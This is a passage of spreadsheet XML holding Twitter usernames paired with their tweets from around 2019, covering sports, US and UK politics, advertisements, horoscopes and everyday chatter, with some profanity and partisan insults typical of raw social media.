    <t>@MuBok_ Make sure your antenna polarisation is correct, use an LNA close to the antenna to minimise coax losses. This is my build : https://t.co/0IJcYGzPtC</t>
  </si>
  <si>
    <t>bobbiejean77</t>
  </si>
  <si>
    <t>@vixmcintyre @Heather4amazon @Truth_Thumper @sexxxtinaaaqua @ChristieLea @PastorJoeFletch @hellcheez @Arachne646 @NARAL This is quite funny. Damn @Twitter you need an edit button. However im sure everyone understood what was implied. I'm not one to proofread my tweets. Sometimes I type too fast other times it's just wrong voice to text. #Trump2020</t>
  </si>
  <si>
    <t>wifewines</t>
  </si>
  <si>
    <t>We’re doing a collab fall line with @Aly_Raisman &amp; I am so excited. I wear these perfect lipsticks every day for work &amp; the new nudes in this collection are the best 😍 https://t.co/NiGU8GdMhX</t>
  </si>
  <si>
    <t>officialfido_</t>
  </si>
  <si>
    <t>Listen to Vrod Beatz - Whip Back by VROD BEATZ. on #SoundCloud https://t.co/rZFZnnAvyY</t>
  </si>
  <si>
    <t>Timber2112</t>
  </si>
  <si>
    <t>@ewarren Congress should not and does not have authority to infringe our 2A rights, period. Nor our 1A rights to join together as the NRA with one voice. Piss off, Nazi. https://t.co/tRHh0Ygo59</t>
  </si>
  <si>
    <t>brattrock</t>
  </si>
  <si>
    <t>eva.markham 💋💋💋💋💋💋💋💋💋You are a 🌠 Thanks to all the solo singer-songwriters for sharing your art with #brattrock !! https://t.co/zu3HSr0mff</t>
  </si>
  <si>
    <t>Lil_Miss_Dangaa</t>
  </si>
  <si>
    <t>@AshlyeKyle If you have thick hair get them to thin it with thinning scissors, they give it some texture to it, this is mine currently, I'm trying to grow it, i also get it feathered around my face for shaping https://t.co/3Z5Exx3cMY</t>
  </si>
  <si>
    <t>ATC32877971</t>
  </si>
  <si>
    <t>@KellyannePolls On his way to a rally https://t.co/eU8A1hcb1g</t>
  </si>
  <si>
    <t>SadieAustin</t>
  </si>
  <si>
    <t>@nowthisnews @JEdImatty11B WHOA !!! Is this the sweet little girl who has been compromised, bought and paid for?? Tell me it ain't so!! That's no way to look, sneering after the President walks by. Little girl needs a nap, and a talking to. And probably, new friends. #NastyFace #FraudulentScam https://t.co/EzpANSSjrx</t>
  </si>
  <si>
    <t>Nevermarrieddat</t>
  </si>
  <si>
    <t>@vanessacvenus African migrants get free plane rides Refugees on Planes Not For Profit Organization sponsoring migrants giving free planes rides to migrants READ AND RETWEET YOU WONT HEAR THIS ON YOUR TV OR THE MEDIA https://t.co/QLRuA4TafZ</t>
  </si>
  <si>
    <t>alyssaxdelrio</t>
  </si>
  <si>
    <t>@graveyardgaga you will be transferred to an adult service don’t worry x</t>
  </si>
  <si>
    <t>CSMikels</t>
  </si>
  <si>
    <t>Pizza and movie night. I set the plates of pizza in the den for the kids. Pizza is immediately knocked over and on the floor. What a waste of pizza and goodwill.</t>
  </si>
  <si>
    <t>corbden</t>
  </si>
  <si>
    <t>I can't recall often going to Oregon suddenly. Only once. And Oregon is only 45 mins away so it's less of an achievement. I've never been to California all of a sudden. Or Canada. Only Idaho has the distinction of frequently suddenly becoming my destination.</t>
  </si>
  <si>
    <t>vlazuvius</t>
  </si>
  <si>
    <t>If I were to ever film a horror movie on campus, I’d have to find a way to incorporate this hallway. The outdated carpet, the narrow width, the old style of exit sign...it evokes something claustrophobic. https://t.co/xgcm7XDexK</t>
  </si>
  <si>
    <t>onthegossipteam</t>
  </si>
  <si>
    <t>@EITMonline I’m sad you guys aren’t back today, but this best of with the durian is still A+</t>
  </si>
  <si>
    <t>sdx76</t>
  </si>
  <si>
    <t>@JudgeJoeBrownTV @godofwine77 Wanting to give Jeanine a run for her money JudgeBrown?</t>
  </si>
  <si>
    <t>KellzNCaLi</t>
  </si>
  <si>
    <t>@fantasyFBdemon my only tough decision now for WR is between Ridley and FItzgerald. Who would you play?</t>
  </si>
  <si>
    <t>petermanna128</t>
  </si>
  <si>
    <t>@MVS__11 If only we could make the same rules about the tax dollars they steal</t>
  </si>
  <si>
    <t>UlvaZell</t>
  </si>
  <si>
    <t>@WashTimes If it’s vicious and nasty it’s because of people like Jim Acosta...</t>
  </si>
  <si>
    <t>xox_dess</t>
  </si>
  <si>
    <t>@RDA_IV Nah! Because the first basemen was crowding the base and they called him out.. and when I told him he need to be sittin in the stands with me if he not gone do his job... he got mad. Probs cause he knew I was right lol</t>
  </si>
  <si>
    <t>SoFloOdle</t>
  </si>
  <si>
    <t>Gained 4 followers and lost 6 (stats by https://t.co/NgaUapEXt9)</t>
  </si>
  <si>
    <t>LiveTrafficNSW</t>
  </si>
  <si>
    <t>NEATH: Take care westbound on Cessnock Rd due to a car crash at Northumberland St. Reduce speed while the crash site is being cleared.</t>
  </si>
  <si>
    <t>GlennSagejones</t>
  </si>
  <si>
    <t>@LanceForman @SteveBarclay No the only acceptable position is to extend article 50 until we have reached a stratagy with suit us both. It didn't say on the ballot paper when we should leave nor now. The brexiteers are not the only people on the country</t>
  </si>
  <si>
    <t>BillyLiar10</t>
  </si>
  <si>
    <t>@charleycharleyH @ReverseGirraffe Not so much ‘dead in a ditch’ more ‘lost in a forest’. I don’t want Johnson dead, but, if he fails to No Deal, Russia will!</t>
  </si>
  <si>
    <t>SoloServicess</t>
  </si>
  <si>
    <t>Big things happening tomorrow. Hopefully we get some people who actually care about #SoloSquad instead of being here for GAW's</t>
  </si>
  <si>
    <t>30Days30WaysUK</t>
  </si>
  <si>
    <t>@rugmarbles Good evening Tara 🙂👋the hashtag is in its 5th year @30Days30WaysUK with daily themes during September. Check out our timeline. Also, find out about us via exploring the website from https://t.co/5LL5OvvSiE Personal #preparedness matters: flooding, fire, severe weather..</t>
  </si>
  <si>
    <t>SkylarR71289351</t>
  </si>
  <si>
    <t>@marklevinshow It's time to hold these people accountable for their crimes. the GOP must grow a spine. No more referrals, only prosecutions.</t>
  </si>
  <si>
    <t>igetmysti</t>
  </si>
  <si>
    <t>@chanteehale @AdrianCJax Congratulations on your sobriety. I do think, however, you've chosen poorly in your response to this completely innocuous question. I won't pretend to understand your struggle, but I somehow doubt lashing out at people you probably don't know is helpful. I wish you peace.</t>
  </si>
  <si>
    <t>kinstery</t>
  </si>
  <si>
    <t>@YourFriendZippy @EdenLevov 😂😂 You are deluded 😂😂 you’re the one who needs a history lesson 😂😂😂</t>
  </si>
  <si>
    <t>NaishaBoricua31</t>
  </si>
  <si>
    <t>So now #HurricaneDorain is supposed to be here tomorrow not tonight. The suspense is killing me, ya'll... https://t.co/ncXyTIXeFp</t>
  </si>
  <si>
    <t>eileenawolter</t>
  </si>
  <si>
    <t>Tell Congress there is no room in government for climate deniers. Answer with Action</t>
  </si>
  <si>
    <t>Gatoram15</t>
  </si>
  <si>
    <t>@nocovfefehere @DaniScotchIrish @WeStandWithEvan @Regan0002112 @Las4Liberty @GitRDoneLarry @DaddyJim52 @acroperr @Mapleleafs141 @brendap1949 @waconia3 @FactCheckU @HSchouten @jeebling @phxtobama16 @just_old_joe @G54Hector @Bruchell1 @PineMountain84 @deaconcruise @oversizedload5 @sphamm2 @SteveioResists @WalterLapp @MarilynCapps @MrsPerrin @Yakekoge @suziferg0806 @Esalo304 @FaustKnowsBest @JohnOSullivan36 @ausmuminfiji @Draniarb @1DontBelieveHim @UnimpressedTX @HockeyFanGirl12 @JeffHarperArt @Carollyn60 @cachobweeney @val_davydov @Teri_A_Adams @desertdave2012 @ExgopMdone @sable227 @bubulaboo @NikWotherspoon Give me 24 hours please. I didn't expect this request to get this far...</t>
  </si>
  <si>
    <t>G_Panton</t>
  </si>
  <si>
    <t>Yeaaaah! Here it is. The secret project I've been working on. Such an insanely good cast including @Nick__Wolfhard @IAm_Montse @BrianDrummondVO &amp; the legendary @HamillHimself! Monsters monsters &amp; more monsters! This show almost broke my voice. So worth it. https://t.co/CNva1QgHRO</t>
  </si>
  <si>
    <t>KingofLs4</t>
  </si>
  <si>
    <t>Now most people would probably say that I'll find the right one someday. But before I do that, I keep wondering how the hell am I gonna get the will to change,to step outside more, fucking drive, to save money responsibly and for the few times it happens, be happy with my life.</t>
  </si>
  <si>
    <t>Nintendork9</t>
  </si>
  <si>
    <t>@RetroGamingDev @ColonelFalcon @Retrogamebrews @Kuniotchi @GeekWithThat @CardiacDrop @GtoTheNextLevel @thetruedonnieg @RerunGamer @NerdOutWithMe You need to get that man something to thank him.</t>
  </si>
  <si>
    <t>LuxuryinNaples</t>
  </si>
  <si>
    <t>I sincerely believe in helping one another out! Even though in real estate we are all independent contractors we can also be friendly competitors. This is why I give my personal time away from my own business to serve as a mentor through my brokerage. https://t.co/QMZMpwFVj4</t>
  </si>
  <si>
    <t>Not_Josh_Either</t>
  </si>
  <si>
    <t>@rangerreeb @LazyMasquerade @LetsReadCreepy @Corpse_Husband Toss in Mr Nightmare and I'd be willing to call it perfect. Still, it looks incredible</t>
  </si>
  <si>
    <t>McgrandlesKevin</t>
  </si>
  <si>
    <t>@chris_sutton73 @policescotland @scottm05 What a horrible thing to say</t>
  </si>
  <si>
    <t>CompleteSherrie</t>
  </si>
  <si>
    <t>@_luistoro @colo_politics Actually editorial sections are for all opinion not just the opinion you agree with. By publishing all opinion the DP is supporting the right to free speech.</t>
  </si>
  <si>
    <t>Cuckbox</t>
  </si>
  <si>
    <t>it is time to fuck consume this "semen" , cockbutt.</t>
  </si>
  <si>
    <t>Buckk009</t>
  </si>
  <si>
    <t>You may want to “try, try, try again” with something that you ... More for Cancer https://t.co/9i3Y1thIpc</t>
  </si>
  <si>
    <t>JamolSimon</t>
  </si>
  <si>
    <t>@RPRTalks You’re verified now. Can you get me in contact with @beyonce or no? Asking for myself.</t>
  </si>
  <si>
    <t>Namhrn</t>
  </si>
  <si>
    <t>@moneybagsodas @genesimmons @FUNBeV1 @ThePartySource Bring it to Spring, TX</t>
  </si>
  <si>
    <t>SonnierDelayne</t>
  </si>
  <si>
    <t>Saints to the Super Bowl, right? #HOUvsNO</t>
  </si>
  <si>
    <t>GL365Radio</t>
  </si>
  <si>
    <t>#NowPlaying Chris Da Ambassada - No to Sin (feat. DJ Nicholas) on https://t.co/umhDZfh8AY #PointingSoulsToChrist #GL365Radio</t>
  </si>
  <si>
    <t>mybitbaby</t>
  </si>
  <si>
    <t>Founder/Registered Midwife of bitbaby Rachael spent the morning with lovely young ladies of @riversidecoll #roleofmidwife #antenatal #postnatal #newbornbaby @WeAreNovaUK @ClareCarolyn1 @KumonPrescot #innovation #innovateher #inspiration #ambition #Entrepreneur https://t.co/JbTkt4brNk</t>
  </si>
  <si>
    <t>aedwardslevy</t>
  </si>
  <si>
    <t>The nice thing is that you could probably make this the nut graf for pretty much any poll story about Trump's ratings from now until the end of his presidency. https://t.co/FyW6nFMSz9 https://t.co/HvrhFCfeLe</t>
  </si>
  <si>
    <t>mariecrz</t>
  </si>
  <si>
    <t>Whose dumb idea was it to sign up for an 8am class on a Saturday!? Oh yea, healthy me - tired me is regretting it real hard.</t>
  </si>
  <si>
    <t>grdz_10</t>
  </si>
  <si>
    <t>I came to work and there are actually people?? Go home bro damn</t>
  </si>
  <si>
    <t>c37919235</t>
  </si>
  <si>
    <t>@Paula55855 @Sunpoches A sad truth there Paula, which they have brought on themselves. Their outrageous behaviour has fueled peoples anger, and I fear their safety could now be compromised. People's voices have been silenced, so some will feel violence is now their only way to be heard.</t>
  </si>
  <si>
    <t>NotSoMardyNow</t>
  </si>
  <si>
    <t>@LikeOldTat When I get home I will tweet the result</t>
  </si>
  <si>
    <t>FDzidula</t>
  </si>
  <si>
    <t>M&amp;J Portable wireless Bluetooth Speaker Stereo big power 10W system TF FM Radio Music Subwoofer Column Speakers for Computer https://t.co/JdbM6J748f 47.99%TAGSC https://t.co/KkzKeJoHZQ</t>
  </si>
  <si>
    <t>OGXEROX</t>
  </si>
  <si>
    <t>Really want to play one last event before hanging it up fully.</t>
  </si>
  <si>
    <t>Dontlookback198</t>
  </si>
  <si>
    <t>@kagorsa The guests, but I’ve had to put them away as I could turn into a termite!</t>
  </si>
  <si>
    <t>BriellePrincess</t>
  </si>
  <si>
    <t>Win a Vrbo $5k Vacay to Breckenridge! https://t.co/vOhOg4jJHA</t>
  </si>
  <si>
    <t>colleen_ashley1</t>
  </si>
  <si>
    <t>The term for when the grapes start to go from green to black is veraison,🍇 I never thought these would get to ripen in my garden as you need approx 100 days of sunshine and maintained temperatures 🍇🍷🍷🍷 #aufaitwithwine #PinotNoir https://t.co/mnK4UTnDus</t>
  </si>
  <si>
    <t>TheMontyShow</t>
  </si>
  <si>
    <t>@ProFootballTalk @PriscoCBS Yeah Mike, learn the game damn it! 😂😂😂😂</t>
  </si>
  <si>
    <t>VolleyballPMHS</t>
  </si>
  <si>
    <t>Volleyball traveling to Poplarville tonight jv 5:00 and varsity 6:00 . Still trying to find that W .</t>
  </si>
  <si>
    <t>TMobileHelp</t>
  </si>
  <si>
    <t>@Smilenr0 Yikes! This is not what we like to hear my friend. We would love the opportunity to turn things around for you. Shoot me a DM so we can work together and get you the resolution that you need. https://t.co/qF1oGJAQaV ^Ashley Lingley</t>
  </si>
  <si>
    <t>BabyTaz9thteen</t>
  </si>
  <si>
    <t>“WhY aRe yOu AlWaYs oN TwItTeR” Because I don’t have anyone to talk to you crackhead</t>
  </si>
  <si>
    <t>byMichaelWest</t>
  </si>
  <si>
    <t>Fellow Hoosier @actordougjones (Pan’s Labyrinth, Shape of Water, Star Trek Discovery) and I will be at #horrorhoundweekend in #Indianapolis, starting Friday, September 6th. I will be signing books all weekend in the Indianapolis Convention Center. Hope to see you there! #horror https://t.co/KQ0cW2oRzA</t>
  </si>
  <si>
    <t>BlazenTheDragon</t>
  </si>
  <si>
    <t>Hey everyone! We live and playing Minecraft on https://t.co/wpM4rd0QsO https://t.co/gp7DuTLPp7</t>
  </si>
  <si>
    <t>MotorCityCasino</t>
  </si>
  <si>
    <t>RuPaul's Drag Race Werq the World Tour is coming to Sound Board on October 22! 💋 Grab your tickets to the party before they go: 💄👉 https://t.co/2HU0VRThdg https://t.co/VFukFdX6kb</t>
  </si>
  <si>
    <t>loudmouthman</t>
  </si>
  <si>
    <t>Played a crazy game called Kamba ryhtm , party, silly .. daft .. yeah put it in the pile it's on Kickstsrt too https://t.co/PZPktKkmDd</t>
  </si>
  <si>
    <t>AlexxxMarie</t>
  </si>
  <si>
    <t>If I were Luke S and someone denied my rose I would have moon walked out of there https://t.co/D2x1WY81sX</t>
  </si>
  <si>
    <t>woahhh</t>
  </si>
  <si>
    <t>Sleepovers when you're the first one up 😣</t>
  </si>
  <si>
    <t>meganDietz6</t>
  </si>
  <si>
    <t>@EmmaFranze I agree with your points; I think it's very important that we leave our pride out of the case and focus on the feelings and emotions that are going on. Connecting the community is a fundamental part of life and growing as well as thriving. #BoulderJustice001</t>
  </si>
  <si>
    <t>noelphx</t>
  </si>
  <si>
    <t>@danmicovic @realDonaldTrump Are you a bot or can you think for yourself?</t>
  </si>
  <si>
    <t>ColourfulCPD</t>
  </si>
  <si>
    <t>Whether you have commited to stay or want to diversify, non-clinical skills are important, helping to improve satisfaction and remove self doubt in clinical practice and opening up new opportunities. https://t.co/p8WH7itkza #veterinary https://t.co/Rhyh058Z7F</t>
  </si>
  <si>
    <t>BdCharmeleon</t>
  </si>
  <si>
    <t>Heading home now. My week at school is done, officially 1/4 of the way done already. ❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️❤️ Now I got two days of work ahead of me (as long as my manager calls me in at least. I’m on a call-in basis) ;3 https://t.co/L2cKP9hHaq</t>
  </si>
  <si>
    <t>chyna_beee</t>
  </si>
  <si>
    <t>This birthday trip fixing to be epic</t>
  </si>
  <si>
    <t>Callahan1212</t>
  </si>
  <si>
    <t>Your extraordinary work leads to extraordinary results. Howeve... More for Leo https://t.co/Upx6hZfyx7</t>
  </si>
  <si>
    <t>noahthebenham</t>
  </si>
  <si>
    <t>I see @Lane8music has joined the Rhythm of the Night train with you, @yottomusic.</t>
  </si>
  <si>
    <t>INDYseal</t>
  </si>
  <si>
    <t>BUT YOU ALL KNOW BETTER &amp; KNOW YOU SHOULD DO SOMETHING TO END THIS TYPE OF GANG STALKING ABUSE ON PEOPLE !</t>
  </si>
  <si>
    <t>_Teddy93</t>
  </si>
  <si>
    <t>Lancaster really shuts down whole ass streets for fucking go kart racing.. Trash ass city.</t>
  </si>
  <si>
    <t>igglez73</t>
  </si>
  <si>
    <t>@TechSceptic @Mr_LarryLegend @HarveySinger @ElijahSchaffer @theblaze The straight white Male is America's biggest enemy right now, didn't you know?</t>
  </si>
  <si>
    <t>MrSugeray</t>
  </si>
  <si>
    <t>@Breaking911 Addressing the elephant in the room is also insensitive to animals</t>
  </si>
  <si>
    <t>olympiadreamer</t>
  </si>
  <si>
    <t>@ScrubOneHD @eplacentia @BrentDicks @gehlertzach @HuffPost You replied in kind... to what?</t>
  </si>
  <si>
    <t>richlocus</t>
  </si>
  <si>
    <t>Trump's new presidential title is the commander-in-cheat.</t>
  </si>
  <si>
    <t>petramonaco</t>
  </si>
  <si>
    <t>The latest Hippie's World! https://t.co/XKd7dQ6bu1 Thanks to @toytrendystore @monkeycomics @SimonFayAuthor #art #handmade</t>
  </si>
  <si>
    <t>fortivus</t>
  </si>
  <si>
    <t>A rundown of all 19 Pacific Northwest indie games in the spotlight at PAX #Startup via https://t.co/V7FfW08zbr https://t.co/nGdLOwwp5X</t>
  </si>
  <si>
    <t>__Aubreyy</t>
  </si>
  <si>
    <t>I need to start giving myself more credit than I actually do</t>
  </si>
  <si>
    <t>SouthernGothic3</t>
  </si>
  <si>
    <t>"My real name isn't even Gwedolyn Nightshadow. It's Stacy. Stacy Deathsatan." I love The Simpsons.</t>
  </si>
  <si>
    <t>official_me4</t>
  </si>
  <si>
    <t>@jenniferhollett At this point I might just vote for that drunk May lady</t>
  </si>
  <si>
    <t>stingerlang</t>
  </si>
  <si>
    <t>@numpangmangan Can i ask for something, here?</t>
  </si>
  <si>
    <t>Alexmoreno07J</t>
  </si>
  <si>
    <t>@morales12317 @OmarKream_ I want to rent a cabin on spring break tbh</t>
  </si>
  <si>
    <t>will__cs</t>
  </si>
  <si>
    <t>can’t wait to spend all this time practicing the spray pattern for the sg for valve to nerf it like they did the aug</t>
  </si>
  <si>
    <t>tatehemlock</t>
  </si>
  <si>
    <t>@TheKatOG @TheDCUniverse @DoomPatrolDCU Yeah I still have my local shop I go to as well! I went and picked up my box on Wednesday but already read all my new goodies! https://t.co/9v8CerIyPY</t>
  </si>
  <si>
    <t>JonPooleDET</t>
  </si>
  <si>
    <t>Kerryon Johnson vs 8+ Man Boxes; Week 3 = 60% [Most in NFL] AVG = 1.8 Week 4 = 7% [24th in NFL] AVG = 4.8 #Lions streched out the D with Staffords arm in week 4 and look what happened... @NextGenStats #OnePride</t>
  </si>
  <si>
    <t>roburban</t>
  </si>
  <si>
    <t>How One Address Led to a $100 Million Tax Credit Scheme https://t.co/v7untbbIyn</t>
  </si>
  <si>
    <t>SDClearPath511</t>
  </si>
  <si>
    <t>US-18: ROAD CLOSED and flooding btwn 0.5mi W and 1mi E of Olivet.</t>
  </si>
  <si>
    <t>unikunka</t>
  </si>
  <si>
    <t>@DomFieldHockey LOL. I don’t just care about the Beals! But I appreciate it</t>
  </si>
  <si>
    <t>fandomhuub</t>
  </si>
  <si>
    <t>mfs will listen to the new dababy album but won’t call and see how dababy mamma is doing 😕</t>
  </si>
  <si>
    <t>JuliadeCadenet</t>
  </si>
  <si>
    <t>Annie Lennox, Chrissie Hynde Call for Brexit Alternative in Letter – Rolling Stone https://t.co/nOHrUfChWT</t>
  </si>
  <si>
    <t>littlebit1193</t>
  </si>
  <si>
    <t>@devinlee549 Yep. I got screwed over last week when the old job didn't pay. And I was still screwed out of 200$ when they did.</t>
  </si>
  <si>
    <t>MarkBermanFox26</t>
  </si>
  <si>
    <t>#Astros biggest comeback of the year.</t>
  </si>
  <si>
    <t>itsme_alycia</t>
  </si>
  <si>
    <t>@maggierogers Can you bring the tour back to Australia pls</t>
  </si>
  <si>
    <t>GretaKnudson</t>
  </si>
  <si>
    <t>From having never coded to orbiting the sun....BOOM! 👊 #TNSTEM https://t.co/CMHv5JWMS8</t>
  </si>
  <si>
    <t>FlyJobFinder</t>
  </si>
  <si>
    <t>✈ Hiring: Opportunities for A&amp;P Mech #AirlineJobs #Boeing #Memphis #crewlife ☑ Apply Now ☞ https://t.co/fQXMblKZBL https://t.co/XJeqUkn9MA</t>
  </si>
  <si>
    <t>botanicayoruba7</t>
  </si>
  <si>
    <t>https://t.co/O0VbLhctQo, 786-769-9841, 10 % OFF and .... FREE SHIPPING WITH $55.00 only customer inside of USA https://t.co/DxLA4KFj2r</t>
  </si>
  <si>
    <t>ellecselogan</t>
  </si>
  <si>
    <t>I lost my wallet and had a mini heart attack trying to figure out if my Polaroid nudes were in there or not. I think I moved them tho</t>
  </si>
  <si>
    <t>PeterVogel</t>
  </si>
  <si>
    <t>@VE7NCD Those weren't that good. My rabbit ears antenna has a broken rod that slips out of the 120 degree angle that is needed. I have to go out there and whack it back into place with a broom. :)</t>
  </si>
  <si>
    <t>SuavelikeLizzy</t>
  </si>
  <si>
    <t>Nah when I deep how Tasha is so quick to sleep with these men on Power my only conclusion is that she uses sex to get through her pain. It’s a pretty fucked coping mechanism but that’s what it’s starting to look like.</t>
  </si>
  <si>
    <t>SusanRSmith71</t>
  </si>
  <si>
    <t>@Sylvia_o2 @ERITFM @MomElizaRoberts These pictures are all from the 1970s. Eric from Another World. Eric ??? Eric from King of the Gypsies.</t>
  </si>
  <si>
    <t>AvalancheJared</t>
  </si>
  <si>
    <t>@LeonKiske I will start covering some of my favorite point and click games at some point in the future, but this one is an adventure game.</t>
  </si>
  <si>
    <t>vex_husky</t>
  </si>
  <si>
    <t>I made a good alien boi he likes tea and soft things despite how edgy he looks. (even though he can't digest anything) Lines by @FelisRandomis https://t.co/EnXeFNvUHD</t>
  </si>
  <si>
    <t>Shemar_Cee23</t>
  </si>
  <si>
    <t>Confessing to someone close to you or, in turn, hearing anothe... More for Capricorn https://t.co/fjcIG5m0gt</t>
  </si>
  <si>
    <t>LukeEMoy</t>
  </si>
  <si>
    <t>@KrinSyn @TransformersTCG @SaraLePew @NickRoche @CaseyWColler The raw power in how many badass artists work on this game is incredible and I love it!!</t>
  </si>
  <si>
    <t>mercedese333</t>
  </si>
  <si>
    <t>@VI09786905 @FLOTUS @realDonaldTrump @WhiteHouse Sad that so many morons only sitting around to criticize.</t>
  </si>
  <si>
    <t>ShawnMertz</t>
  </si>
  <si>
    <t>@PHelp716 And look around the AFC, this is a legit wild card contender.</t>
  </si>
  <si>
    <t>OsgoodePD</t>
  </si>
  <si>
    <t>Do you represent creditors or debtors? Get the latest #insolvency trend updates on Oct. 4: https://t.co/0AHjtBQoq4 https://t.co/qLgySteGxk</t>
  </si>
  <si>
    <t>NBCNewsWorld</t>
  </si>
  <si>
    <t>Exclusive: A rare look at Russia’s military might in the Arctic https://t.co/Gbh0IwpzhU</t>
  </si>
  <si>
    <t>DillonDavis56</t>
  </si>
  <si>
    <t>@JasonMorrow270 I’m guessing enough people have already complained to the university that it’s been sacked.</t>
  </si>
  <si>
    <t>mc_curen</t>
  </si>
  <si>
    <t>Why are there so many 🌈 on profiles out here? Are you sure you know the meaning or a case of copy and paste??</t>
  </si>
  <si>
    <t>arturo500011</t>
  </si>
  <si>
    <t>@thehill @VP ...on the golf course.</t>
  </si>
  <si>
    <t>robin_jbrooks</t>
  </si>
  <si>
    <t>Does anyone every actually sort 'price: high to low'?</t>
  </si>
  <si>
    <t>NaviWatson</t>
  </si>
  <si>
    <t>I wanna go to carnival next year</t>
  </si>
  <si>
    <t>DJGeorgeButler</t>
  </si>
  <si>
    <t>@akcrono @thew0wguy @Brian_MPLS @mattyglesias @HeerJeet No, these are examples of the leaders of the party and their actions. The Democratic Party isn’t good. It’s just not the Republican Party, which makes them “good” by comparison. I’ve always voted Democrat, but I’ve never considered myself a Democrat because why?</t>
  </si>
  <si>
    <t>dragon_slumber</t>
  </si>
  <si>
    <t>What would @tryguys be without @KeithHabs ? The Tri-Guys</t>
  </si>
  <si>
    <t>nimbusready</t>
  </si>
  <si>
    <t>@Sweatcicle I hope current bounties and powerful engrams drop at whatever current level you obtaied them. So you're forced to farm in new content like how it was in D1</t>
  </si>
  <si>
    <t>HillckHill</t>
  </si>
  <si>
    <t>@7kidchaos @HeidiNBC Both Hunter Biden and his lawyer have spoken to the press since this accusation was made. Do your homework instead of pretending no one has looked into it.</t>
  </si>
  <si>
    <t>RavenHawk4</t>
  </si>
  <si>
    <t>@ken05552743 @colliertimothy8 Yes... "everybody wants to go to heaven but - nobody wants to die"..!!</t>
  </si>
  <si>
    <t>RadioNOW1009</t>
  </si>
  <si>
    <t>Someone flashed @PostMalone while he was performing and his reaction was PRICELESS! Of course, now it's getting the meme treatment. See the pic and the memes here --&gt; https://t.co/SBCFrVQdOe https://t.co/aFbVaOwQPt</t>
  </si>
  <si>
    <t>fakeronwash38</t>
  </si>
  <si>
    <t>@Slick_Jules @AthleticsWin Yah, they've been watching the A's for sure.</t>
  </si>
  <si>
    <t>brambo13</t>
  </si>
  <si>
    <t>Hey FedUpW/ the DNC *one of the squad*🌹(@shipman96), thank you for following me</t>
  </si>
  <si>
    <t>King__IV</t>
  </si>
  <si>
    <t>Happy birthday to the artist himself @IAMWILLBANKS — enjoy it man!! God willing many more 🙏🏾🎈🔥</t>
  </si>
  <si>
    <t>Ezzy_Ea</t>
  </si>
  <si>
    <t>@sssssssssierra You gon answer the next time you’re hit up, put the caps away 🙄</t>
  </si>
  <si>
    <t>csbaker</t>
  </si>
  <si>
    <t>In the sanctuary of the city called “House of God” Amaziah the priest says to God’s prophet, “Don’t prophesy here anymore, because this is the *king’s* sanctuary and the house of the *king*.” Absolutely chilling. #SermonPrep #SermonPreview #Amos</t>
  </si>
  <si>
    <t>bot_culture</t>
  </si>
  <si>
    <t>I'm Carter Grant from have sought Culture and here are 10 pilchards who rode the Blue Meanie</t>
  </si>
  <si>
    <t>TheLoneToken</t>
  </si>
  <si>
    <t>@ColdAssDJ 🤣🤣🤣 She just wanted to touch my poontang!</t>
  </si>
  <si>
    <t>JessLynnMoreno</t>
  </si>
  <si>
    <t>@JoeyLusv @ArendtDr @RyanMarino This week was the first time someone suggested I might be a shill... And I tell myself I don't hear that much because I really am pretty blunt with everyone and I think most people feel they can trust me because of that... So the pharma shill thing just caught me off guard!</t>
  </si>
  <si>
    <t>newsyc100</t>
  </si>
  <si>
    <t>From FOMO to JOMO: the joy of missing out https://t.co/o1jNTy2iQN (https://t.co/GAamWyp1A5)</t>
  </si>
  <si>
    <t>RezzoHuncho</t>
  </si>
  <si>
    <t>I think everyday how I’m going to act when i get rich</t>
  </si>
  <si>
    <t>LaTurnt</t>
  </si>
  <si>
    <t>@Scizas330 Umm....who you fucking? Usually the first time is a test drive, the second time is a 30-day lease.</t>
  </si>
  <si>
    <t>JDeGeytere</t>
  </si>
  <si>
    <t>The bears didn’t make a FG that was a lie</t>
  </si>
  <si>
    <t>SamuelCoverdale</t>
  </si>
  <si>
    <t>@_youhadonejob1 This is the poster I want in my grown up room</t>
  </si>
  <si>
    <t>remu10</t>
  </si>
  <si>
    <t>New post (Chris Bosh On The 2013 NBA Finals) has been published on Make Money Online - https://t.co/YACW9ZAEnw https://t.co/HNN0hctGm8</t>
  </si>
  <si>
    <t>iPestwaco</t>
  </si>
  <si>
    <t>Looking for termite control solutions in Waco? https://t.co/eUHINf0XpB Your FREE Inspection Awaits!! Click or Call 254.855.6647 &amp; schedule TODAY!</t>
  </si>
  <si>
    <t>KCJHoop</t>
  </si>
  <si>
    <t>@MorrisseyCST I miss The Viper.</t>
  </si>
  <si>
    <t>walkdownman</t>
  </si>
  <si>
    <t>"...please take the witness stand..."</t>
  </si>
  <si>
    <t>LukeDelfino</t>
  </si>
  <si>
    <t>@huttser_coyote Massage and Munchies ;3</t>
  </si>
  <si>
    <t>Ellieenorr</t>
  </si>
  <si>
    <t>Bruh I ran out of time but I was on the last question</t>
  </si>
  <si>
    <t>DCNewsNA</t>
  </si>
  <si>
    <t>Lanner Electronics brings hyperconvergence to Open Compute Project https://t.co/e8FtcRiRIL</t>
  </si>
  <si>
    <t>suz___m</t>
  </si>
  <si>
    <t>@leftwingedduck @DerbyChrisW @jessphillips @margarethodge They can't. It is an internal process and they have to respect that. Let's hope the court sides with Chris on Thursday #IStandWithChrisWilliamson</t>
  </si>
  <si>
    <t>PewterReport</t>
  </si>
  <si>
    <t>Cover 3: How Whitehead Became The Playmaker The Bucs Need https://t.co/r3Jw3gSwu2</t>
  </si>
  <si>
    <t>Michael38999261</t>
  </si>
  <si>
    <t>@CNN In reason this is a result of the lefts disregard for life. With abortion being considered moral, young women find no value in the life the carry!</t>
  </si>
  <si>
    <t>purg4t0ryb0und</t>
  </si>
  <si>
    <t>About to rock the world with Lucas, brb</t>
  </si>
  <si>
    <t>WSWGlasgowWx</t>
  </si>
  <si>
    <t>White Squirrel Weather, WKU Glasgow at sunset and it's 84.2 F https://t.co/8XdIVkjY8y</t>
  </si>
  <si>
    <t>ManuelZaldivarB</t>
  </si>
  <si>
    <t>@bubbaprog And to think is a genius with big words. Man</t>
  </si>
  <si>
    <t>Champ_Hunt</t>
  </si>
  <si>
    <t>Had to be him 🇮🇳 @imVkohli once again proved to be the difference, playing an unbeaten knock of 7️⃣2️⃣ and leading the Men in Blue to victory in Mohali. Man of the Match? #cricket #champhunt #IndvsSA #ViratKohli https://t.co/0n6RDFoabH</t>
  </si>
  <si>
    <t>RubenNavarrette</t>
  </si>
  <si>
